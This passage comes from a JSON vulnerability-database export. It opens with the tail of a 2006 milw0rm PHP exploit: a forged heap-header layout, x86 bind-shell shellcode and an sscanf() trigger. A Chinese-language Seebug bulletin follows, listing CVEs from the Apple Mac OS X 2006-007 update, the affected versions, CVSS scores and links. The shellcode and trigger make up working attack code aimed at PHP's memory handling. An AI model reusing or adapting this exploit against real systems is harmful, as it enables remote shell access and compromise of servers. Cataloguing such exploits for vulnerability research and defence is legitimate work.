long2str(0x00000001) .\n\t /* _zval_struct.type, _zval_struct.is_ref, _zval_struct.refcount */\n long2str($zval_attr) .\n\t /* _zend_mem_header */\n\t /* _zend_mem_header.pNext = start of shellcode */\n long2str($base_addr + 28) .\n\t /* _zend_mem_header.pLast */\n long2str($ret_loc) .\n\t /* zend_mem_header.size, zend_mem_header.cached */\n\t long2str(0x000000400) .\n\t /* jump over next six bytes */\n\t \"\\xeb\\x06\\x90\\x90\" .\n\t /* this bytes will be overwritten by efree() */\n\t \"\\x90\\x90\\x90\\x90\" .\n\t /* shell code starts here -\n\t * BigHawk bind() version - just a little update to get rid\n\t * of 0x3f \n\t */\n\t \"\\x31\\xdb\\xf7\\xe3\\xb0\\x66\\x53\\x43\\x53\\x43\\x53\\x89\\xe1\\x4b\\xcd\" .\n\t \"\\x80\\x89\\xc7\\x52\\x66\\x68\\x4e\\x20\\x43\\x66\\x53\\x89\\xe1\\xb0\\xef\" .\n\t \"\\xf6\\xd0\\x50\\x51\\x57\\x89\\xe1\\xb0\\x66\\xcd\\x80\\xb0\\x66\\x43\\x43\" .\n\t \"\\xcd\\x80\\x50\\x50\\x57\\x89\\xe1\\x43\\xb0\\x66\\xcd\\x80\\x89\\xd9\\x89\" .\n\t \"\\xc3\\xb0\\x6f\\x2c\\x30\\x49\\xcd\\x80\\x41\\xe2\\xf6\\x51\\x68\\x6e\\x2f\" .\n\t \"\\x73\\x68\\x68\\x2f\\x2f\\x62\\x69\\x89\\xe3\\x51\\x53\\x89\\xe1\\xb0\\xf4\" .\n\t \"\\xf6\\xd0\\xcd\\x80\" .\n\t /* fill up memory */\n\t str_repeat(long2str($base_addr), $base_addr_fill);\n\n /* fill up memory with emalloc() for sscanf() */\n quotemeta($data);\n\n /* trigger exploit */\n sscanf($data, '%1$s', $str);\n?>\n\n# milw0rm.com [2006-08-16]\n", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2193/"}], "seebug": [{"lastseen": "2017-11-19T22:20:08", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "Apple Mac OS X\u662f\u4e00\u6b3e\u57fa\u4e8eBSD\u7684\u64cd\u4f5c\u7cfb\u7edf\u3002\r\n\r\nApple Mac OS X\u5b58\u5728\u591a\u4e2a\u5b89\u5168\u95ee\u9898\uff0c\u8fdc\u7a0b\u548c\u672c\u5730\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u6f0f\u6d1e\u8fdb\u884c\u6076\u610f\u4ee3\u7801\u6267\u884c\uff0c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\uff0c\u7279\u6743\u63d0\u5347\uff0c\u8986\u76d6\u6587\u4ef6\uff0c\u83b7\u5f97\u654f\u611f\u4fe1\u606f\u7b49\u653b\u51fb\u3002\r\n\r\n\u5177\u4f53\u95ee\u9898\u5982\u4e0b\uff1a\r\n\r\nAirPort\uff0dCVE-ID: CVE-2006-5710\uff1a\r\n\r\nAirPort\u65e0\u7ebf\u9a71\u52a8\u4e0d\u6b63\u786e\u5904\u7406\u5e94\u7b54\u5e27\uff0c\u53ef\u5bfc\u81f4\u57fa\u4e8e\u5806\u7684\u6ea2\u51fa\u3002\r\n\r\nATS\uff0dCVE-ID: CVE-2006-4396\uff1a\r\n\r\nApple Type\u670d\u52a1\u4e0d\u5b89\u5168\u5efa\u7acb\u9519\u8bef\u65e5\u81f3\u53ef\u5bfc\u81f4\u4efb\u610f\u6587\u4ef6\u8986\u76d6\u3002\r\n\r\nATS\uff0dCVE-ID: CVE-2006-4398\uff1a\r\n\r\nApple Type\u670d\u52a1\u5b58\u5728\u591a\u4e2a\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u53ef\u5bfc\u81f4\u4ee5\u9ad8\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\nATS\uff0dCVE-ID: CVE-2006-4400\uff1a\r\n\r\n\u5229\u7528\u7279\u6b8a\u7684\u5b57\u4f53\u6587\u4ef6\uff0c\u53ef\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\n\r\nCFNetwork\uff0dCVE-ID: CVE-2006-4401\uff1a\r\n\r\n\u901a\u8fc7\u8bf1\u4f7f\u7528\u6237\u8bbf\u95ee\u6076\u610fftp URI\uff0c\u53ef\u5bfc\u81f4\u4efb\u610fftp\u547d\u4ee4\u6267\u884c\u3002\r\n\r\nClamAV\uff0dCVE-ID: CVE-2006-4182\uff1a\r\n\r\n\u6076\u610femail\u6d88\u606f\u53ef\u5bfc\u81f4ClamAV\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\nFinder\uff0dCVE-ID: CVE-2006-4402\uff1a\r\n\r\n\u901a\u8fc7\u6d4f\u89c8\u5171\u4eab\u76ee\u5f55\u53ef\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u6216\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\nftpd\uff0dCVE-ID: CVE-2006-4403\uff1a\r\n\r\n\u5f53ftp\u8bbf\u95ee\u542f\u7528\u65f6\uff0c\u672a\u6388\u6743\u7528\u6237\u53ef\u5224\u522b\u5408\u6cd5\u7684\u8d26\u6237\u540d\u3002\r\n\r\ngnuzip\uff0dCVE-ID: CVE-2006-4334, CVE-2006-4335, CVE-2006-4336, CVE-2006-4337, CVE-2006-4338\uff1a\r\n\r\ngunzip\u5904\u7406\u538b\u7f29\u6587\u4ef6\u5b58\u5728\u591a\u4e2a\u95ee\u9898\uff0c\u53ef\u5bfc\u81f4\u5e94\u7528\u7a0b\u5e8f\u5d29\u6e83\u6216\u6267\u884c\u4efb\u610f\u6307\u4ee4\u3002\r\n\r\nInstaller\uff0dCVE-ID: CVE-2006-4404\uff1a\r\n\r\n\u5f53\u4ee5\u7ba1\u7406\u7528\u6237\u5b89\u88c5\u8f6f\u4ef6\u65f6\uff0c\u7cfb\u7edf\u6743\u9650\u53ef\u80fd\u88ab\u672a\u6388\u6743\u5229\u7528\u3002\r\n\r\nOpenSSL\uff0dCVE-ID: CVE-2006-2937, CVE-2006-2940, CVE-2006-3738, CVE-2006-4339, CVE-2006-4343\uff1a\r\n\r\nOpenSSL\u5b58\u5728\u591a\u4e2a\u5b89\u5168\u95ee\u9898\u53ef\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u6216\u8005\u83b7\u5f97\u654f\u611f\u4fe1\u606f\u3002\r\n\r\nperl\uff0dCVE-ID: CVE-2005-3962\uff1a\r\n\r\n\u4e0d\u5b89\u5168\u5904\u7406\u5b57\u7b26\u4e32\uff0c\u53ef\u5bfc\u81f4Perl\u5e94\u7528\u7a0b\u5e8f\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\nPHP\uff0dCVE-ID: CVE-2006-1490, CVE-2006-1990\uff1a\r\n\r\nPhp\u5e94\u7528\u7a0b\u5e8f\u5b58\u5728\u591a\u4e2a\u95ee\u9898\uff0c\u53ef\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6216\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\nPHP\uff0dCVE-ID: CVE-2006-5465\uff1a\r\n\r\nPHP\u7684htmlentities()\u548chtmlspecialchars()\u51fd\u6570\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\uff0c\u53ef\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\n\r\nPPP\uff0dCVE-ID: CVE-2006-4406\uff1a\r\n\r\n\u5728\u4e0d\u53ef\u4fe1\u7684\u672c\u5730\u7f51\u7edc\u4e0a\u4f7f\u7528PPPoE\u53ef\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\r\n\r\nSamba\uff0dCVE-ID: CVE-2006-3403\uff1a\r\n\r\n\u5f53Windows\u5171\u4eab\u4f7f\u7528\u65f6\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u8fdb\u884c\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n\r\nSecurity Framework\uff0dCVE-ID: CVE-2006-4407\uff1a\r\n\r\n\u4e0d\u5b89\u5168\u7684\u4f20\u9001\u65b9\u6cd5\u53ef\u5bfc\u81f4\u4e0d\u534f\u5546\u6700\u5b89\u5168\u7684\u52a0\u5bc6\u4fe1\u606f\u3002\r\n\r\nSecurity Framework\uff0dCVE-ID: CVE-2006-4408\uff1a\r\n\r\n\u5904\u7406X.509\u8bc1\u4e66\u65f6\u53ef\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u653b\u51fb\u3002\r\n\r\nSecurity Framework\uff0dCVE-ID: CVE-2006-4409\uff1a\r\n\r\n\u5f53\u4f7f\u7528http\u4ee3\u7406\u65f6\uff0c\u8bc1\u4e66\u5e9f\u5f03\u5217\u8868\u4e0d\u80fd\u83b7\u5f97\u3002\r\n\r\nSecurity Framework\uff0dCVE-ID: CVE-2006-4410\uff1a\r\n\r\n\u90e8\u5206\u8c03\u7528\u8bc1\u4e66\u9519\u8bef\u7684\u88ab\u6388\u6743\u3002\r\n\r\nVPN\uff0dCVE-ID: CVE-2006-4411:\r\n\r\n\u6076\u610f\u672c\u5730\u7528\u6237\u53ef\u83b7\u5f97\u7cfb\u7edf\u7279\u6743\u3002\r\n\r\nWebKit\uff0dCVE-ID: CVE-2006-4412\uff1a\r\n\r\n\u901a\u8fc7\u8bf1\u4f7f\u7528\u6237\u6d4f\u89c8\u6076\u610fweb\u9875\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\r\n\r\n\n\nApple Mac OS X Server 10.4.8\r\nApple Mac OS X Server 10.4.7\r\nApple Mac OS X Server 10.4.6\r\nApple Mac OS X Server 10.4.5\r\nApple Mac OS X Server 10.4.4\r\nApple Mac OS X Server 10.4.3\r\nApple Mac OS X Server 10.4.2\r\nApple Mac OS X Server 10.4.1\r\nApple Mac OS X Server 10.4\r\nApple Mac OS X Server 10.3.9\r\nApple Mac OS X Server 10.3.8\r\nApple Mac OS X Server 10.3.7\r\nApple Mac OS X Server 10.3.6\r\nApple Mac OS X Server 10.3.5\r\nApple Mac OS X Server 10.3.4\r\nApple Mac OS X Server 10.3.3\r\nApple Mac OS X Server 10.3.2\r\nApple Mac OS X Server 10.3.1\r\nApple Mac OS X Server 10.3\r\nApple Mac OS X Server 10.2.8\r\nApple Mac OS X Server 10.2.7\r\nApple Mac OS X Server 10.2.6\r\nApple Mac OS X Server 10.2.5\r\nApple Mac OS X Server 10.2.4\r\nApple Mac OS X Server 10.2.3\r\nApple Mac OS X Server 10.2.2\r\nApple Mac OS X Server 10.2.1\r\nApple Mac OS X Server 10.2\r\nApple Mac OS X Server 10.1.5\r\nApple Mac OS X Server 10.1.4\r\nApple Mac OS X Server 10.1.3\r\nApple Mac OS X Server 10.1.2\r\nApple Mac OS X Server 10.1.1\r\nApple Mac OS X Server 10.1\r\nApple Mac OS X Server 10.0\r\nApple Mac OS X 10.4.8\r\nApple Mac OS X 10.4.7\r\nApple Mac OS X 10.4.6\r\nApple Mac OS X 10.4.5\r\nApple Mac OS X 10.4.4\r\nApple Mac OS X 10.4.3\r\nApple Mac OS X 10.4.2\r\nApple Mac OS X 10.4.1\r\nApple Mac OS X 10.4\r\nApple Mac OS X 10.3.9\r\nApple Mac OS X 10.3.8\r\nApple Mac OS X 10.3.7\r\nApple Mac OS X 10.3.6\r\nApple Mac OS X 10.3.5\r\nApple Mac OS X 10.3.4\r\nApple Mac OS X 10.3.3\r\nApple Mac OS X 10.3.2\r\nApple Mac OS X 10.3.1\r\nApple Mac OS X 10.3\r\nApple Mac OS X 10.2.8\r\nApple Mac OS X 10.2.7\r\nApple Mac OS X 10.2.6\r\nApple Mac OS X 10.2.5\r\nApple Mac OS X 10.2.4\r\nApple Mac OS X 10.2.3\r\nApple Mac OS X 10.2.2\r\nApple Mac OS X 10.2.1\r\nApple Mac OS X 10.2\r\nApple Mac OS X 10.1.5\r\nApple Mac OS X 10.1.4\r\nApple Mac OS X 10.1.3\r\nApple Mac OS X 10.1.2\r\nApple Mac OS X 10.1.1\r\nApple Mac OS X 10.1\r\nApple Mac OS X 10.1\r\nApple Mac OS X 10.0.4\r\nApple Mac OS X 10.0.3\r\nApple Mac OS X 10.0.2\r\nApple Mac OS X 10.0.1\r\nApple Mac OS X 10.0 3\r\nApple Mac OS X 10.0 \r\n\n <a href=\"http://docs.info.apple.com/article.html?artnum=304829\" target=\"_blank\">http://docs.info.apple.com/article.html?artnum=304829</a>", "reporter": "Root", "published": "2006-11-29T00:00:00", "type": "seebug", "title": "Apple Mac OS X 2006-007\u5b58\u5728\u591a\u4e2a\u5b89\u5168\u6f0f\u6d1e", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2005-3962", "CVE-2006-1490", "CVE-2006-1990", "CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3403", "CVE-2006-3738", "CVE-2006-4182", "CVE-2006-4334", "CVE-2006-4335", "CVE-2006-4336", "CVE-2006-4337", "CVE-2006-4338", "CVE-2006-4339", "CVE-2006-4343", "CVE-2006-4396", "CVE-2006-4398", "CVE-2006-4400", "CVE-2006-4401", "CVE-2006-4402", "CVE-2006-4403", "CVE-2006-4404", "CVE-2006-4406", "CVE-2006-4407", "CVE-2006-4408", "CVE-2006-4409", "CVE-2006-4410", "CVE-2006-4411", "CVE-2006-4412", "CVE-2006-5465", "CVE-2006-5710"], "_object_type": "robots.models.seebug.SeebugBulletin", "modified": "2006-11-29T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-623", "id": "SSV:623", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "status": "details"}]}
